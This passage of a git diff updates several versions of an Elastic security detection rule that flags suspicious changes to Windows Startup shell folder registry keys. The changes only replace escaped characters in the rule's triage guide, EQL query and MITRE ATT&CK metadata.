Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", "related_integrations": [ { 
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_105.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_105.json
index 90889b85a27..0971ce8658a 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_105.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Startup Shell Folder Modification", - "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", "related_integrations": [ { 
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_106.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_106.json
index de10640d26e..e3c8b9cafdd 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_106.json
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Startup Shell Folder Modification",
- "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n",
 "related_integrations": [
 {
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_107.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_107.json
index e90cf674060..8efd2b5ff7e 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_107.json
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Startup Shell Folder Modification",
- "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
